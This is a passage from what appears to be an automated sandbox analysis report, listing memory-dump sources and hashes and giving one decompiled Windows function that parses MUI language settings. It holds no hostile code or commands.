                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                                                                              • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                                                              • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                                                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                                                              • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                                                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                                                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                              			E00C08788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				short* _v12;
                                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                                              				signed int _v32;
                                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                                              				signed int _v40;
                                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                                                              				signed int _v52;
                                                                                                                                                                                                              				signed int _v56;
                                                                                                                                                                                                              				signed int _v60;
                                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                                              				void* _t216;
                                                                                                                                                                                                              				intOrPtr _t231;
                                                                                                                                                                                                              				short* _t235;
                                                                                                                                                                                                              				intOrPtr _t257;
                                                                                                                                                                                                              				short* _t261;
                                                                                                                                                                                                              				intOrPtr _t284;
                                                                                                                                                                                                              				intOrPtr _t288;
                                                                                                                                                                                                              				void* _t314;
                                                                                                                                                                                                              				signed int _t318;
                                                                                                                                                                                                              				short* _t319;
                                                                                                                                                                                                              				intOrPtr _t321;
                                                                                                                                                                                                              				void* _t328;
                                                                                                                                                                                                              				void* _t329;
                                                                                                                                                                                                              				char* _t332;
                                                                                                                                                                                                              				signed int _t333;
                                                                                                                                                                                                              				signed int* _t334;
                                                                                                                                                                                                              				void* _t335;
                                                                                                                                                                                                              				void* _t338;
                                                                                                                                                                                                              				void* _t339;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t328 = __edx;
                                                                                                                                                                                                              				_t322 = __ecx;
                                                                                                                                                                                                              				_t318 = 0;
                                                                                                                                                                                                              				_t334 = _a4;
                                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                                              				_v48 = 0;
                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                              				_v40 = 0;
                                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                                              				_v52 = 0;
                                                                                                                                                                                                              				if(_t334 == 0) {
                                                                                                                                                                                                              					_t329 = 0xc000000d;
                                                                                                                                                                                                              					L49:
                                                                                                                                                                                                              					_t334[0x11] = _v56;
                                                                                                                                                                                                              					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                                                                              					_t334[0x12] = _v60;
                                                                                                                                                                                                              					_t334[0x13] = _v28;
                                                                                                                                                                                                              					_t334[0x17] = _v20;
                                                                                                                                                                                                              					_t334[0x16] = _v48;
                                                                                                                                                                                                              					_t334[0x18] = _v40;
                                                                                                                                                                                                              					_t334[0x14] = _v32;
                                                                                                                                                                                                              					_t334[0x15] = _v52;
                                                                                                                                                                                                              					return _t329;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_v56 = 0;
                                                                                                                                                                                                              				if(E00C08460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                                              					_v56 = 1;
                                                                                                                                                                                                              					if(_v8 != 0) {
                                                                                                                                                                                                              						_t207 = E00BEE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_push(1);
                                                                                                                                                                                                              					_v8 = _t318;
                                                                                                                                                                                                              					E00C0718A(_t207);
                                                                                                                                                                                                              					_t335 = _t335 + 4;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_v60 = _v60 | 0xffffffff;
                                                                                                                                                                                                              				if(E00C08460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                                              					_t333 =  *_v8;
                                                                                                                                                                                                              					_v60 = _t333;
                                                                                                                                                                                                              					_t314 = E00BEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                              					_push(_t333);
                                                                                                                                                                                                              					_v8 = _t318;
                                                                                                                                                                                                              					E00C0718A(_t314);
                                                                                                                                                                                                              					_t335 = _t335 + 4;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t216 = E00C08460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                                                                              				_t332 = ";";
                                                                                                                                                                                                              				if(_t216 < 0) {
                                                                                                                                                                                                              					L17:
                                                                                                                                                                                                              					if(E00C08460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                                              						L30:
                                                                                                                                                                                                              						if(E00C08460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                                              							L46:
                                                                                                                                                                                                              							_t329 = 0;
                                                                                                                                                                                                              							L47:
                                                                                                                                                                                                              							if(_v8 != _t318) {
                                                                                                                                                                                                              								E00BEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if(_v28 != _t318) {
                                                                                                                                                                                                              								if(_v20 != _t318) {
                                                                                                                                                                                                              									E00BEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                                              									_v20 = _t318;
                                                                                                                                                                                                              									_v40 = _t318;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L49;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t231 = _v24;
                                                                                                                                                                                                              						_t322 = _t231 + 4;
                                                                                                                                                                                                              						_push(_t231);
                                                                                                                                                                                                              						_v52 = _t322;
                                                                                                                                                                                                              						E00C0718A(_t231);
                                                                                                                                                                                                              						if(_t322 == _t318) {
                                                                                                                                                                                                              							_v32 = _t318;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							_v32 = E00BEE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_v32 == _t318) {
                                                                                                                                                                                                              							_v52 = _t318;
                                                                                                                                                                                                              							L58:
                                                                                                                                                                                                              							_t329 = 0xc0000017;
                                                                                                                                                                                                              							goto L47;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							E00BE2340(_v32, _v8, _v24);
                                                                                                                                                                                                              							_v16 = _v32;
                                                                                                                                                                                                              							_a4 = _t318;
                                                                                                                                                                                                              							_t235 = E00BFE679(_v32, _t332);
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								_t319 = _t235;
                                                                                                                                                                                                              								if(_t319 == 0) {
                                                                                                                                                                                                              									break;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								 *_t319 = 0;
                                                                                                                                                                                                              								_t321 = _t319 + 2;
                                                                                                                                                                                                              								E00BEE2A8(_t322,  &_v68, _v16);
                                                                                                                                                                                                              								if(E00C05553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              									_a4 = _a4 + 1;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_v16 = _t321;
                                                                                                                                                                                                              								_t235 = E00BFE679(_t321, _t332);
                                                                                                                                                                                                              								_pop(_t322);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t236 = _v16;
                                                                                                                                                                                                              							if( *_v16 != _t319) {
                                                                                                                                                                                                              								E00BEE2A8(_t322,  &_v68, _t236);
                                                                                                                                                                                                              								if(E00C05553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              									_a4 = _a4 + 1;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if(_a4 == 0) {
                                                                                                                                                                                                              								E00BEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                                                                              								_v52 = _v52 & 0x00000000;
                                                                                                                                                                                                              								_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if(_v8 != 0) {
                                                                                                                                                                                                              								E00BEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                              							_t318 = 0;
                                                                                                                                                                                                              							goto L46;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t257 = _v24;
                                                                                                                                                                                                              					_t322 = _t257 + 4;
                                                                                                                                                                                                              					_push(_t257);
                                                                                                                                                                                                              					_v40 = _t322;
                                                                                                                                                                                                              					E00C0718A(_t257);
                                                                                                                                                                                                              					_t338 = _t335 + 4;
                                                                                                                                                                                                              					if(_t322 == _t318) {
                                                                                                                                                                                                              						_v20 = _t318;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_v20 = E00BEE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_v20 == _t318) {
                                                                                                                                                                                                              						_v40 = _t318;
                                                                                                                                                                                                              						goto L58;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						E00BE2340(_v20, _v8, _v24);
                                                                                                                                                                                                              						_v16 = _v20;
                                                                                                                                                                                                              						_a4 = _t318;
                                                                                                                                                                                                              						_t261 = E00BFE679(_v20, _t332);
                                                                                                                                                                                                              						_t335 = _t338 + 0x14;
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							_v12 = _t261;
                                                                                                                                                                                                              							if(_t261 == _t318) {
                                                                                                                                                                                                              								break;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v12 = _v12 + 2;
                                                                                                                                                                                                              							 *_v12 = 0;
                                                                                                                                                                                                              							E00BEE2A8(_v12,  &_v68, _v16);
                                                                                                                                                                                                              							if(E00C05553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              								_a4 = _a4 + 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v16 = _v12;
                                                                                                                                                                                                              							_t261 = E00BFE679(_v12, _t332);
                                                                                                                                                                                                              							_pop(_t322);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t269 = _v16;
                                                                                                                                                                                                              						if( *_v16 != _t318) {
                                                                                                                                                                                                              							E00BEE2A8(_t322,  &_v68, _t269);
                                                                                                                                                                                                              							if(E00C05553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              								_a4 = _a4 + 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_a4 == _t318) {
                                                                                                                                                                                                              							E00BEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                                              							_v40 = _t318;
                                                                                                                                                                                                              							_v20 = _t318;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_v8 != _t318) {
                                                                                                                                                                                                              							E00BEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_v8 = _t318;
                                                                                                                                                                                                              						goto L30;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t284 = _v24;
                                                                                                                                                                                                              				_t322 = _t284 + 4;
                                                                                                                                                                                                              				_push(_t284);
                                                                                                                                                                                                              				_v48 = _t322;
                                                                                                                                                                                                              				E00C0718A(_t284);
                                                                                                                                                                                                              				_t339 = _t335 + 4;
                                                                                                                                                                                                              				if(_t322 == _t318) {
                                                                                                                                                                                                              					_v28 = _t318;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_v28 = E00BEE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if(_v28 == _t318) {
                                                                                                                                                                                                              					_v48 = _t318;
                                                                                                                                                                                                              					goto L58;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					E00BE2340(_v28, _v8, _v24);
                                                                                                                                                                                                              					_v16 = _v28;
                                                                                                                                                                                                              					_a4 = _t318;
                                                                                                                                                                                                              					_t288 = E00BFE679(_v28, _t332);
                                                                                                                                                                                                              					_t335 = _t339 + 0x14;
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						_v12 = _t288;
                                                                                                                                                                                                              						if(_t288 == _t318) {
                                                                                                                                                                                                              							break;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_v12 = _v12 + 2;
                                                                                                                                                                                                              						 *_v12 = 0;
                                                                                                                                                                                                              						E00BEE2A8(_v12,  &_v68, _v16);
                                                                                                                                                                                                              						if(E00C05553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              							_a4 = _a4 + 1;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_v16 = _v12;
                                                                                                                                                                                                              						_t288 = E00BFE679(_v12, _t332);
                                                                                                                                                                                                              						_pop(_t322);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t296 = _v16;
                                                                                                                                                                                                              					if( *_v16 != _t318) {
                                                                                                                                                                                                              						E00BEE2A8(_t322,  &_v68, _t296);
                                                                                                                                                                                                              						if(E00C05553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              							_a4 = _a4 + 1;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_a4 == _t318) {
                                                                                                                                                                                                              						E00BEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                                                                              						_v48 = _t318;
                                                                                                                                                                                                              						_v28 = _t318;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_v8 != _t318) {
                                                                                                                                                                                                              						E00BEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_v8 = _t318;
                                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}





































                                                                                                                                                                                                              0x00c08788
                                                                                                                                                                                                              0x00c08788
                                                                                                                                                                                                              0x00c08791
                                                                                                                                                                                                              0x00c08794
                                                                                                                                                                                                              0x00c08798
                                                                                                                                                                                                              0x00c0879b
                                                                                                                                                                                                              0x00c0879e
                                                                                                                                                                                                              0x00c087a1
                                                                                                                                                                                                              0x00c087a4
                                                                                                                                                                                                              0x00c087a7
                                                                                                                                                                                                              0x00c087aa
                                                                                                                                                                                                              0x00c087af
                                                                                                                                                                                                              0x00c51ad3
                                                                                                                                                                                                              0x00c08b0a
                                                                                                                                                                                                              0x00c08b0d
                                                                                                                                                                                                              0x00c08b13
                                                                                                                                                                                                              0x00c08b19
                                                                                                                                                                                                              0x00c08b1f
                                                                                                                                                                                                              0x00c08b25
                                                                                                                                                                                                              0x00c08b2b
                                                                                                                                                                                                              0x00c08b31
                                                                                                                                                                                                              0x00c08b37
                                                                                                                                                                                                              0x00c08b3d
                                                                                                                                                                                                              0x00c08b46
                                                                                                                                                                                                              0x00c08b46
                                                                                                                                                                                                              0x00c087c6
                                                                                                                                                                                                              0x00c087d0
                                                                                                                                                                                                              0x00c51ae0
                                                                                                                                                                                                              0x00c51ae6
                                                                                                                                                                                                              0x00c51af8
                                                                                                                                                                                                              0x00c51af8
                                                                                                                                                                                                              0x00c51afd
                                                                                                                                                                                                              0x00c51afe
                                                                                                                                                                                                              0x00c51b01
                                                                                                                                                                                                              0x00c51b06
                                                                                                                                                                                                              0x00c51b06
                                                                                                                                                                                                              0x00c087d6
                                                                                                                                                                                                              0x00c087f2
                                                                                                                                                                                                              0x00c087f7
                                                                                                                                                                                                              0x00c08807
                                                                                                                                                                                                              0x00c0880a
                                                                                                                                                                                                              0x00c0880f
                                                                                                                                                                                                              0x00c08810
                                                                                                                                                                                                              0x00c08813
                                                                                                                                                                                                              0x00c08818
                                                                                                                                                                                                              0x00c08818
                                                                                                                                                                                                              0x00c0882c
                                                                                                                                                                                                              0x00c08831
                                                                                                                                                                                                              0x00c08838
                                                                                                                                                                                                              0x00c08908
                                                                                                                                                                                                              0x00c08920
                                                                                                                                                                                                              0x00c089f0
                                                                                                                                                                                                              0x00c08a08
                                                                                                                                                                                                              0x00c08af6
                                                                                                                                                                                                              0x00c08af6
                                                                                                                                                                                                              0x00c08af8
                                                                                                                                                                                                              0x00c08afb
                                                                                                                                                                                                              0x00c51beb
                                                                                                                                                                                                              0x00c51beb
                                                                                                                                                                                                              0x00c08b04
                                                                                                                                                                                                              0x00c51bf8
                                                                                                                                                                                                              0x00c51c0e
                                                                                                                                                                                                              0x00c51c13
                                                                                                                                                                                                              0x00c51c16
                                                                                                                                                                                                              0x00c51c16
                                                                                                                                                                                                              0x00c51bf8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c08b04
                                                                                                                                                                                                              0x00c08a0e
                                                                                                                                                                                                              0x00c08a11
                                                                                                                                                                                                              0x00c08a14
                                                                                                                                                                                                              0x00c08a15
                                                                                                                                                                                                              0x00c08a18
                                                                                                                                                                                                              0x00c08a22
                                                                                                                                                                                                              0x00c08b59
                                                                                                                                                                                                              0x00c08a28
                                                                                                                                                                                                              0x00c08a3c
                                                                                                                                                                                                              0x00c08a3c
                                                                                                                                                                                                              0x00c08a42
                                                                                                                                                                                                              0x00c51bb0
                                                                                                                                                                                                              0x00c51b11
                                                                                                                                                                                                              0x00c51b11
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c08a48
                                                                                                                                                                                                              0x00c08a51
                                                                                                                                                                                                              0x00c08a5b
                                                                                                                                                                                                              0x00c08a5e
                                                                                                                                                                                                              0x00c08a61
                                                                                                                                                                                                              0x00c08a69
                                                                                                                                                                                                              0x00c08a69
                                                                                                                                                                                                              0x00c08a6d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c08a74
                                                                                                                                                                                                              0x00c08a7c
                                                                                                                                                                                                              0x00c08a7d
                                                                                                                                                                                                              0x00c08a91
                                                                                                                                                                                                              0x00c08a93
                                                                                                                                                                                                              0x00c08a93
                                                                                                                                                                                                              0x00c08a98
                                                                                                                                                                                                              0x00c08a9b
                                                                                                                                                                                                              0x00c08aa1
                                                                                                                                                                                                              0x00c08aa1
                                                                                                                                                                                                              0x00c08aa4
                                                                                                                                                                                                              0x00c08aaa
                                                                                                                                                                                                              0x00c08ab1
                                                                                                                                                                                                              0x00c08ac5
                                                                                                                                                                                                              0x00c08ac7
